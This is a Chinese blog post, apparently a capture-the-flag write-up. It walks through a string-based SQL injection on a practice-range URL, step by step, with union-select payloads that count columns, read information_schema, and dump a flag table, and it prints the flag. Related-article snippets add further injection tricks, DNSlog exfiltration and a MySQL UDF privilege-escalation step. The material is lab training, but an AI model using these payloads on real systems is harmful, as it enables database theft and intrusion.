安鸾渗透实战平台-SQL字符型注入

最新推荐文章于 2022-09-13 22:58:40 发布
最新推荐文章于 2022-09-13 22:58:40 发布
阅读量495 收藏 1
点赞数
文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qxx5203/article/details/125910100
版权

漏洞URL:http://47.103.94.191:8005//bug/sql_injection/sql_string.php?title=1&submit=submit 

尝试一下万能密码1' or '1'='1,不是我们需要的内容

  • 猜解列名数量(字段数) 
    1' order by 1 #

    4页面显示不正常,发现最大正常位是3 

  •  

  • 查看报错位(2,3报错) 
    1' union select 1,2,3 #

  • 获取数据库信息
  • 获取数据库名称、数据库表的信息,表中有flag表  
    1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() #

  • 查找flag表下的列

    数据库列的信息:id,flag

    1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='flag' #

     

  • 获取flag

    1' union select 1,flag,3 from dwvs.flag #

  • 提交flag

    flag{3fac9e7cf81d710fd1a15f011d60739f}

     

     

差一点成熟。
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL字符注入漏洞.pdf
07-18
配套博客:https://blog.csdn.net/qq_41739364/article/details/94025729
sqIi-labs,SQL注入平台
08-06
sqIi-labs:是一款学习SQL注入的开源平台,共有75种不同类注入 解压密码:ms08067.com sqIi-labs的使用文章见:https://blog.csdn.net/qq_41453285/article/details/100827739
安鸾渗透实战平台-sql注入
weixin_48421613的博客
01-04 3213
sql注入安鸾渗透实战平台是一个在线的靶场平台,需要通过一些列手段找到flag提交 文章目录sql注入SQL字符注入(1-2)一、需识别mysql默认的information库二、内部结构1.schemata表内容2.tables表内容3.columns表内容4.解题思路SQL搜索注入总结 SQL字符注入(1-2) 开始忘记截图了,只好给大家直接写一下payload了 提示:仅适合参考 一、需识别mysql默认的information库 mysql 5.0版本以上会有一个默认的infor
linux mysql udf 提权
ddr12231的博客
05-09 681
连接远程数据库 查看插件库路径 show variables like '%plugin%'; 写入udf库到插件目录: select unhex('7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000...
安鸾渗透实战平台|SQL数字注入详细教程
qq_67262179的博客
05-06 1439
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录@[TOC](文章目录) 安鸾渗透实战平台|SQL数字注入详细教程前言一、Mysql默认的information库基本1.schemata表内容2.tables表内容3.columns表内容二、渗透靶场地址三、mysql渗透步骤1.进入靶场,查看页面基本信息2.判断是否存在注入3.判断是否存在 符号过滤4.判断数据库字段列名数量5.使用联合查询判断显位点6.基本信息收集7.查询指定数据(cms)库下所有的表名8.查询指定表明下的.
安鸾渗透实战平台|SQL数字GET注入02
m_de_g的博客
12-04 1488
安鸾渗透实战平台|SQL数字GET注入02 一、渗透靶场地址 http://whalwl.work:8034/ 二、渗透实战 1.开始以为渗透后台,避免采坑 admin' or 1=1 # 123 直接就进入后台啦 2.实战开始,在搜索中输入1',报错 1' 3.当我们在后面加个#时,正常回显 1'# 4.判断or,and,空格或等号是否被过滤 1' or 1=1# 1' and 1=1# 根据报错信息,发现过滤了等号,使用like绕过 1' or 1 like 1# 1' a
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
SQLmap--SQL注入渗透测试工具
04-18
SQLmap--SQL注入渗透测试工具 方便进行SQL注入渗透测试,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。 它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹...
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
特别的sql注入方式-DNSlog注入--安鸾靶场练习 DNSlog注入学习
AAAAAAAAAAAA66的博客
01-05 2209
DNSlog注入 原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 利用的场景 存在sql注入 无法获得回显 对目标网站可以发起请求 简单的来说就是可以利用 load_file() 函数,在存在注入的情况下将数据库中的信息带出我们的域名日志中(dnslog).详细的可以看下方链接 DNSLog在MySQL注入
网站渗透实战篇.全面解析漏洞(20节课)
10-15
网站渗透实战篇.全面解析漏洞,内富解压密码,请看说明
【学习笔记】Web安全测试,渗透测试之Sql字符注入案例解析及学习笔记整理。
哥老倌的博客
07-25 606
渗透测试】 第一阶段:安全测试概述。 1.网络安全:根据我国网络安全法规定,未经过授权的扫描都是违法的。 第二阶段:情报搜集 1.解析DNS服务器信息:站长之家、爱站,通过whois查询网站信息。 2.子域名信息:主域名防御等级过高,可以通过子域名发起攻击(Layer子域名挖掘工具) 3.开放的端口 4.确定版本信息: (1)协议类:HTTP/1.1 200 OK ...
SQL宽字节注入01
海宝最美的博客
12-20 276
靶机地址:http://www.whalwl.top:8011【2020年8月前有效】 1、http://www.whalwl.top:8011/wide.php?id=1%bf' and 1=1 %23 //不报错 http://www.whalwl.top:8011/wide.php?id=1%bf' and 1=2%23 //报错 代码执行,说明存在注入 2、i...
Webservice之应用协议SOAP
心火燃烧!
11-08 592
什么是SOAP? SOAP 是一种简单的基于 XML 的协议,它使应用程序通过 HTTP 来交换信息。或者更简单地说:SOAP 是用于访问网络服务的协议。 SOAP 指简易对象访问协议 SOAP 是一种通信协议 SOAP 用于应用程序之间的通信 SOAP 是一种用于发送消息的格式 SOAP 被设计用来通过因特网进行通信 SOAP 独立于平台 SOAP 独立于语言 SOAP 基于 XML SOAP...
SQL注入原理-字符注入
最新发布
T1ngSh0w的博客
09-13 8971
SQL注入原理-字符注入
安鸾SQL系列之数字字符
柠鹿的轨迹
04-02 1875
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本文首发于 涂寐’s Blogs:https://0xtlu.github.io/article/81e90e43.html
SQL注入:搜索注入
qxx5203的博客
07-22 2607
SQL语句selectusername,idfromadminwhereusernamelike'%$name%'"%"匹配任何字符,"like"的意思就是像,"$"变量。正常回显,却无法判断字段数,也无法查看报错位。数据库表的信息(blog,heroes,movies,进入靶场后出现此界面,在登录界面输入。8页面显示不正常,发现最大正常位是。数据库列的信息id,num,判断一下是数字还是字符。账号密码错误或用户未注册!搜索框内输入a正常回显。...
安鸾靶场 sql注入--SQL数字GET注入01
s666789s的博客
04-06 570
1.SQL数字GET注入01 (1)输入1’报错,输入-1返回正常,构造payload (2)判断显示位 -1 order by 3# -1 union select 1,2,3# (3)爆库:-1 union select 1,database(),3# (4)爆表:-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘dwvs’# (5)爆列:-1 union se

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值